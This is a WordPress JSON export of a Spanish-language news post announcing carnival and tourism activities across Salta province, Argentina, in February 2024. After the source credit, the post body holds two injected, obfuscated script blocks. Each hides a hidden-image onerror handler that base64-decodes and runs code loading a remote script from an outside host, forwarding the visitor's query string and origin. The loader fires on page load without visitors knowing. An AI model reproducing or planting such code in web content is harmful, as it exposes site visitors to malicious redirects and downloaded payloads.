{"id":3658,"date":"2024-02-09T10:08:21","date_gmt":"2024-02-09T13:08:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3658"},"modified":"2025-08-14T00:01:01","modified_gmt":"2025-08-14T03:01:01","slug":"salta-te-invita-a-vivir-un-fin-de-semana-a-puro-carnaval","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3658","title":{"rendered":"Salta te invita a vivir un fin de semana a puro carnaval"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-1af13f3bc2e957b5c2fb9070360fc15c\" style=\"background-color:#9b0b39\"><em>Contin\u00faa desarroll\u00e1ndose con \u00e9xito el programa de experiencias tur\u00edsticas de verano organizado por el Ministerio de Turismo y Deportes de la Provincia junto al sector privado y los gobiernos municipales.<\/em><\/h4>\n\n\n\n<p>En el marco del programa de experiencias tur\u00edsticas que propone Salta para el verano, salte\u00f1os y turistas tendr\u00e1n un abanico de propuestas para disfrutar durante el fin de semana largo a puro carnaval. Las mismas se pueden consultar&nbsp;en los Centros de Atenci\u00f3n al Visitante de cada municipio y&nbsp; en&nbsp;www.saltacalendario.gob.ar.<\/p>\n\n\n\n<p>A continuaci\u00f3n las actividades que se realizar\u00e1n en las 7 regiones de la provincia&nbsp;hasta el martes 13 de febrero.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10891-carnaval.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10891-carnaval.jpg\" alt=\"Carnaval\" style=\"width:283px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En la localidad de&nbsp;La Vi\u00f1a&nbsp;el s\u00e1bado 10 habr\u00e1 un encuentro de academias de danzas folkl\u00f3ricas como previa al Festival de Humor y Canto que se desarrollar\u00e1 el domingo 11 en el Complejo Municipal. Asimismo desde el viernes se llevar\u00e1 adelante en&nbsp;Animan\u00e1&nbsp;la 39\u00ba Vendimia Salte\u00f1a con desfile de carrozas y elecci\u00f3n de la Reina de la Vendimia.<\/p>\n\n\n\n<p>En el municipio de&nbsp;Cachi&nbsp;arrancan las actividades de carnaval el s\u00e1bado 10 con el desentierro en la Plaza Principal y un taller de armado de flores y ornamentos carnavaleros en el Sitio El Tero. Se suman tambi\u00e9n un encuentro de copleros y bagualeras, el carnaval kallchaki, los corsos de la familia y el carnaval de anta\u00f1o.<\/p>\n\n\n\n<p>A 10 kil\u00f3metros de la ciudad de Salta, en&nbsp;San Lorenzo&nbsp;el s\u00e1bado habr\u00e1 una Pe\u00f1a Carnavalera y el domingo ser\u00e1 el desentierro del carnaval. En tanto en&nbsp;San Antonio de los Cobres&nbsp;se realizar\u00e1 el 8 de febrero el jueves de comadres, el s\u00e1bado 10 el desentierro y desde el domingo se podr\u00e1 disfrutar del carnaval grande.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10892-carnaval.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10892-carnaval.jpg\" alt=\"Carnaval\" style=\"width:287px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Por otro lado se podr\u00e1n vivir los Corsos de la Familia en la Plaza Gral. San Mart\u00edn de&nbsp;La Caldera&nbsp;y en la Costanera de la localidad de&nbsp;Vaqueros; y los Corsos Color en&nbsp;Or\u00e1n&nbsp;y&nbsp;Tartagal, adem\u00e1s en ambos municipios el martes 13 se realizar\u00e1 la Chaya del Carnaval.<\/p>\n\n\n\n<p>Asimismo en la localidad de&nbsp;El Carril&nbsp;se podr\u00e1 disfrutar durante todo el fin de semana del carnaval de sabores con promociones especiales acompa\u00f1adas por murgas y comparsas&nbsp; y el domingo 11 ser\u00e1 el desentierro del carnaval. Lunes y martes en el municipio de&nbsp;Met\u00e1n&nbsp;habr\u00e1 un encuentro de batucadas.<\/p>\n\n\n\n<p>Tambi\u00e9n el carnaval se vivir\u00e1 en&nbsp;Guachipas&nbsp;con sus corsos Guachipe\u00f1os, en Payogasta con el tradicional Carnaval de Anta\u00f1o; y en&nbsp;Cerrillos, donde como todos los a\u00f1os, se llevar\u00e1 adelante la 118\u00ba edici\u00f3n de los Corsos de Flores con su tradicional desfile de agrupaciones carnestolendas de todo el Valle de Lerma. En esta localidad adem\u00e1s el domingo 11 se realizar\u00e1 un encuentro de bandoneones y el martes 13 el entierro del carnaval y quema del Pujillay.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10893-carnaval.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10893-carnaval.jpg\" alt=\"Carnaval\" style=\"width:388px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>M\u00e1s actividades<\/strong><\/p>\n\n\n\n<p>En el Museo Hist\u00f3rico del Norte de la&nbsp;Ciudad de Salta&nbsp;se desarrollar\u00e1 durante todo el fin de semana diferentes actividades como la Trivia Hist\u00f3rica en el Cabildo \u00bfCu\u00e1nto sabes sobre historia? y una kermes con un espacio permanente con juegos grupales e individuales para disfrutar en familia.<\/p>\n\n\n\n<p>En el municipio de&nbsp;San Lorenzo&nbsp;se puede disfrutar los jueves y s\u00e1bado desde las 16 y los domingo desde las 9 de un Mini Trekking guiado por la Reserva Las Yungas, esta actividad requiere inscripci\u00f3n previa; en tanto en la Quebrada los d\u00edas jueves, s\u00e1bado y martes desde las 16 se llevar\u00e1 adelante un taller de danzas folcl\u00f3ricas y el viernes 26 se podr\u00e1 participar de un recorrido por el sendero interpretativo. A estas actividades se suma el s\u00e1bado y el domingo la Feria Gastron\u00f3mica El Zorzal.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10894-carnaval.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10894-carnaval.jpg\" alt=\"Carnaval.\" style=\"width:342px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Por otro lado en&nbsp;San Antonio de los Cobres&nbsp;del jueves al martes se podr\u00e1 realizar una caminata guiada por el pueblo para conocer sus atractivos y recorrer el Mercado Artesanal. Esos d\u00edas adem\u00e1s en la localidad de La Caldera estar\u00e1 abierta la pileta municipal.<\/p>\n\n\n\n<p>Traslad\u00e1ndonos al Valle de Lerma, en la localidad de&nbsp;El Carril&nbsp;durante todo el fin de semana se podr\u00e1 vivir un Verano Explosivo con tapeo regional y los mejores vinos salte\u00f1os y disfrutar de la Semana de la Pizza y la Cerveza. Asimismo en&nbsp;Chicoana&nbsp;se realizar\u00e1 el domingo la III Feria de Peque\u00f1os Productores de Escoipe \u201cEl Escoipe\u00f1a\u201d.<\/p>\n\n\n\n<p>En tanto en el municipio de&nbsp;Met\u00e1n&nbsp;el s\u00e1bado se desarrollar\u00e1 el encuentro de viveros y artesanos, en Vaqueros la Feria municipal y de emprendedores, y en Rosario de la Frontera una movida de verano por el aniversario de apertura del Parque Acu\u00e1tico Termal.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10895-carnaval.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10895-carnaval.jpg\" alt=\"Carnaval.\" style=\"width:332px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En los Valles Calchaqu\u00edes,&nbsp;Cachi&nbsp;propone distintas actividades, del jueves al martes, desde las 9 se desarrollar\u00e1 la actividad Turismo Rural Comunitario El Toste visitando familias productoras y artesanas, y Turismo Con Identidad recorriendo distintos sitios arqueol\u00f3gicos.<\/p>\n\n\n\n<p>Tambi\u00e9n en la localidad habr\u00e1 un patio de juegos y muestras que se renovar\u00e1n cada 15 d\u00edas en el Museo Arqueol\u00f3gico; se realizar\u00e1n recorridos guiados por los Sitios Arqueol\u00f3gicos El Tero y Las Pailas; y exposici\u00f3n y venta de producci\u00f3n local con artesan\u00edas y vinos regionales en la Plaza Principal.<\/p>\n\n\n\n<p>A estas actividades se suma la oferta de aventura, naturaleza y gastronom\u00eda que invitan a disfrutar de Salta con todos los sentidos; desde el aire en globo aerost\u00e1tico, rafting en el ca\u00f1\u00f3n del r\u00edo Juramento, actividades n\u00e1uticas en el dique Cabra Corral, de una empanadas y de un vino de altura.<\/p>\n\n\n\n<p>El calendario completo se puede consultar en&nbsp;<a href=\"http:\/\/www.visitsalta.ar%20\/\">http:\/\/www.visitsalta.ar&nbsp;<\/a>o en&nbsp;<a href=\"http:\/\/www.saltacalendario.gob.ar.\/\">http:\/\/www.saltacalendario.gob.ar.<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10896-carnaval.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10896-carnaval.jpg\" alt=\"Carnaval\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-te-invita-a-vivir-un-fin-de-semana-a-puro-carnaval-94134\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Contin\u00faa desarroll\u00e1ndose con \u00e9xito el programa de experiencias tur\u00edsticas de verano organizado por el Ministerio de Turismo y Deportes de la Provincia junto al sector privado y los gobiernos municipales. En el marco del programa de experiencias tur\u00edsticas que propone Salta para el verano, salte\u00f1os y turistas tendr\u00e1n un abanico de propuestas para disfrutar durante [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3659,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-3658","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3658"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3658"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3658\/revisions"}],"predecessor-version":[{"id":6858,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3658\/revisions\/6858"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3659"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3658"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3658"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3658"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}